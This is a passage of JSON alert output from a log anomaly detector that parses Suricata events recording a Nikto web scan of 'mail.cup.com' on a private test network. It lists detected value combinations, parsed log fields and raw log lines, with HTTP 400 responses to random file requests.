"03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80", "/parser/model/time": 1583349514.201581, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46812, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nn", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.201869, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46812, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1416587572285516, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80", "/parser/model/time": 1583349514.203262, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46814, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.eml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.203479, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46814, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1094550924433338, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80", "/parser/model/time": 1583349514.204806, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46816, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.backup", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20503, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":733129426476444,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46816, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":733129426476444,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 733129426476444, 